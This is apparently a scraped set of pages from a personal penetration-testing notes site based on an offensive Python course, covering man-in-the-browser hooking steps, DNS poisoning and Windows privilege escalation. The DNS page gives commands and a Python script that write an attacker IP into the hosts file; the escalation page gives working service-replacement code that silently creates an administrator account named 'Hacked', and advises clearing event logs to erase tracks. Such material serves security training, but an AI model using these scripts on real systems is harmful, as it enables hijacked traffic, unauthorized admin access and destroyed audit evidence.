* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
All the browsers offer to save username/password when you submit these data into a login page, so on the next time you visit the same login page you will see your username/password are automatically filled in without typing a single letter. Also, there's third party software like lastpass can do the same job for you.
If the target was using this method for login, then neither the keylogger nor the clipboard methods will work.
Modern hackers have invented a new attack called -man in the browser- to overcome the above scenario.
In a nutshell, man in the browser attack intercepts the browser API calls and extracts the data (clear text) before it's getting out to the network socket (SSL encrypted).
Steps to intercept a process API calls are:-
--------------------------------------------
A. Get the Process ID (PID) of the browser process
B. Attach a debugger to this PID
C. Specify the DLL library that you want to intercept
D. Specify the function name and resolve its memory address
E. Set BreakPoint and register a call back function
F. Wait for debug events using debug loop
G. Once the debug event occur ( meaning once the browser calls the function inside the DLL), execute the call back function
H. Return the original process
Last update: 2024-03-29
Created: April 20, 2023 16:58:49
Back to top
---
# DNS poisoning - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#dns-poisoning)
DNS poisoning
=============
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
**1.** Add a new line to hosts file in windows with attacker IP and an url
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-0-1) | `echo 10.10.120.12 google.com >> c:\Windows\System32\drivers\etc` |
**2.** Flush the DNS cache to make sure that we will use the updated record
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-1-1) | `ipconfig /flushdns` |
Now traffic will be redirected to the attacker machine.
Python script for DNS poisoning
-------------------------------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-1)
[2](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-2)
[3](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-3)
[4](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-4)
[5](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-5)
[6](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-6)
[7](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-7)
[8](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-8)
[9](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-9)
[10](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-10)
[11](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-11)
[12](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/#__codelineno-2-12) | `import subprocess import os os.chdir("C:\Windows\System32\drivers\etc") command = "echo 10.10.10.100 www.google.com >> hosts" CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)` |
Last update: 2024-03-29
Created: April 20, 2023 16:58:49
Back to top
---
# Privilege escalation - Weak service file permission - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#privilege-escalation-weak-service-file-permission)
Privilege escalation - Weak service file permission
===================================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
Setting up the lab
------------------
**1.** Download vulnerable application from https://www.exploit-db.com/exploits/24872 and install it for all users on a windows VM.
**2.** Create a non admin account in the Windows VM. For instance: - user: nonadmin - password: 123123
**3.** Restart the windows VM and login as nonadmin user.
**4.** Open the PhotoDex application and in Task Manager locate the service that gets created by the application. It's called ScsiAccess.ç
**5.** Open properties of ScsiAccess service and locate the path to executable. It should be something like:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-0-1) | `C:\Program Files\Photodex\ProShow PRoducer\ScsiAccess.exe` |
**6.** We can replace that file with a malicious service file that will be triggered when opening the Photodex application and get us escalated to admin privileges.
**7.** Script for windows 7 app. Go to step 8 for windows 10. Jump to step 9 after this step.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-1)
[2](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-2)
[3](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-3)
[4](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-4)
[5](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-5)
[6](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-6)
[7](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-7)
[8](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-8)
[9](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-9)
[10](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-10)
[11](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-11)
[12](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-12)
[13](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-13)
[14](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-14)
[15](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-15)
[16](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-16)
[17](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-17)
[18](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-18)
[19](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-19)
[20](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-20)
[21](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-21)
[22](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-22)
[23](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-23)
[24](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-24)
[25](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-25)
[26](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-26)
[27](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-27)
[28](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-28)
[29](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-29)
[30](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-30)
[31](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-31)
[32](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-32)
[33](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-33)
[34](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-34)
[35](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-35)
[36](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-36)
[37](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-37)
[38](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-38)
[39](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-39)
[40](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-40)
[41](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-41)
[42](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-42)
[43](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-43)
[44](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-44)
[45](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-45)
[46](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-46)
[47](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-47)
[48](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-48)
[49](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-49)
[50](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-50)
[51](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-51)
[52](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-52)
[53](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-1-53) | `# Windows 7 import servicemanager import win32serviceutil import win32service import win32api import os import ctypes class Service(win32serviceutil.ServiceFramework): _svc_name_ = 'ScsiAccess' _svc_display_name_ = 'ScsiAccess' def __init__(self, *args): win32serviceutil.ServiceFramework.__init__(self, *args) def sleep(self, sec): win32api.Sleep(sec*1000, True) def SvcDoRun(self): self.ReportServiceStatus(win32service.SERVICE_START_PENDING) try: self.ReportServiceStatus(win32service.SERVICE_RUNNING) self.start() except: self.SvcStop() def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) self.stop() self.ReportServiceStatus(win32service.SERVICE_STOPPEED) def start(self): self.runflag=True f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w') if ctypes.windll.shell32.IsUserAnAdmin() == 0: f.write('[-] We are NOT admin') else: f.write('[+] We are admin') f.close() def stop(self): self.runflag=False if __name__ == '__main__': servicemanager.Initialize() servicemanager.PrepareToHostSingle(Service) servicemanager.StartServiceCtrlDispatcher() win32serviceutil.HandleCommandLine(Service)` |
We can use py2exe to craft an exe file for that python script:
This setup file will convert the python script scsiaccess.py into an exe file:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-1)
[2](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-2)
[3](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-3)
[4](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-4)
[5](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-5)
[6](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-6)
[7](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-7)
[8](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-8)
[9](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-2-9) | `from distutils.core import setup import py2exe, sys, os sys.arg.append("py2exe") setup( options = {'py2exe': {'bundle_files': 1}}, windows = [ {'script': "scsiaccess.py"}], zipfule = None )` |
You can also use [pyinstaller](https://amandaguglieri.github.io/hackinglife/pyinstaller/)
:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-3-1) | `Pyinstaller --onfile Create_New_Admin_account.py` |
**8.** Script for Windows 10:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-1)
[2](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-2)
[3](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-3)
[4](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-4)
[5](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-5)
[6](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-6)
[7](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-7)
[8](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-8)
[9](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-9)
[10](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-10)
[11](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-11)
[12](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-12)
[13](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-13)
[14](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-14)
[15](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-15)
[16](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-16)
[17](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-17)
[18](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-18)
[19](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-19)
[20](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-20)
[21](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-21)
[22](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-22)
[23](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-23)
[24](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-24)
[25](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-25)
[26](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-26)
[27](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-27)
[28](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-28)
[29](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-29)
[30](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-30)
[31](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-31)
[32](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-32)
[33](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-33)
[34](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-34)
[35](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-35)
[36](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-36)
[37](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-37)
[38](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-38)
[39](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-39)
[40](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-40)
[41](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-41)
[42](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-42)
[43](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-43)
[44](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-44)
[45](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-45)
[46](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-46)
[47](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-47)
[48](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-48)
[49](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-49)
[50](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-50)
[51](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-51)
[52](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-52)
[53](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-53)
[54](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-54)
[55](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-55)
[56](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-56)
[57](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-57)
[58](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-58)
[59](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-59)
[60](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-60)
[61](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-61)
[62](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-62)
[63](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-63)
[64](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-64)
[65](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-65)
[66](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-66)
[67](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-67)
[68](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-68)
[69](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-69)
[70](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-70)
[71](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-71)
[72](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-72)
[73](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-73)
[74](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-74)
[75](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-75)
[76](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-76)
[77](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-77)
[78](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-4-78) | `# The order of importing libraries matter. "servicemanager" should be imported after win32X. As following:- import win32serviceutil import win32service import win32api import win32timezone import win32net import win32netcon import servicemanager ## the rest of the code is still the same import os import ctypes class Service(win32serviceutil.ServiceFramework): _svc_name_ = 'ScsiAccess' _svc_display_name_ = 'ScsiAccess' def __init__(self, *args): win32serviceutil.ServiceFramework.__init__(self, *args) def sleep(self, sec): win32api.Sleep(sec*1000, True) def SvcDoRun(self): self.ReportServiceStatus(win32service.SERVICE_START_PENDING) try: self.ReportServiceStatus(win32service.SERVICE_RUNNING) self.start() except: self.SvcStop() def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) self.stop() self.ReportServiceStatus(win32service.SERVICE_STOPPEED) def start(self): self.runflag=True USER = "Hacked" GROUP = "Administrators" user_info = dict ( name = USER, password = "python", priv = win32netcon.USER_PRIV_USER, home_dir = None, comment = None, flags = win32netcon.UF_SCRIPT, script_path = None ) user_group_info = dict ( domainandname = USER ) try: win32net.NetUserAdd (None, 1, user_info) win32net.NetLocalGroupAddMembers (None, GROUP, 3, [user_group_info]) except Exception, x: pass ''' f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w') if ctypes.windll.shell32.IsUserAnAdmin() == 0: f.write('[-] We are NOT admin') else: f.write('[+] We are admin') f.close() ''' def stop(self): self.runflag=False if __name__ == '__main__': servicemanager.Initialize() servicemanager.PrepareToHostSingle(Service) servicemanager.StartServiceCtrlDispatcher() win32serviceutil.HandleCommandLine(Service)` |
To export into EXE use:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-5-1) | `` Pyinstaller --onfile Create_New_Admin_account.py` `` |
**9.** Replace the service file, under
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-6-1) | `` C:\Program Files (x86)\Photodex\ProShow Producer` `` |
**10.** Rename the original scsiaccess to scsiaccess123.
**11.** Put your Python exe as scsiaccess (without .exe).
**12.** Restart and test- You should see "Hacked" account been created.
### Python script to check if we are admin users on Windows
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-7-1)
[2](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-7-2)
[3](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-7-3)
[4](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-7-4)
[5](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/#__codelineno-7-5) | `import ctypes if ctypes.windll.shell32.IsUserAnAdmin() == 0: print '[-] We are NOT admin! ' else: print '[+] We are admin :) '` |
Erasing tracks
--------------
Once you are admin, open Event Viewer and go to Windows Logs. Click right button on Applications and Security and the option "Clear Logs".
Last update: 2024-03-29
Created: April 20, 2023 16:58:49
Back to top
---
# Index of downloads - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/files/index-of-files/#index-of-downloads)
Index of downloads
==================
These are some of the tools that I use when conducting penetration testing. Most of them have their own updated repositories, so the best approach for you would be to visit the official repository or download the source code. In my case, when dealing with restricted environments, there are times when I require a direct download of a previously verified and clean file. Therefore, the main goal of this list is to provide me with these resources when needed, within a matter of seconds.
* Binscope: [BinScope\_x64.msi](https://amandaguglieri.github.io/hackinglife/files/BinScope_x64.msi)
* Echo Mirage: [EchoMirage.zip](https://amandaguglieri.github.io/hackinglife/files/EchoMirage.zip)
| [Echo Mirage at HackingLife](https://amandaguglieri.github.io/hackinglife/echo-mirage/)
* Processhacker 2.39 bin: [processhacker-2.39-bin.zip](https://amandaguglieri.github.io/hackinglife/files/processhacker-2.39-bin.zip)
| [Process Hacker Monitor at HackingLife](https://amandaguglieri.github.io/hackinglife/process-hacker-tool/)
.
* RegistryChangesView:
* RegistryChangesView (x64): [registrychangesview-x64.zip](https://amandaguglieri.github.io/hackinglife/files/registrychangesview-x64.zip)
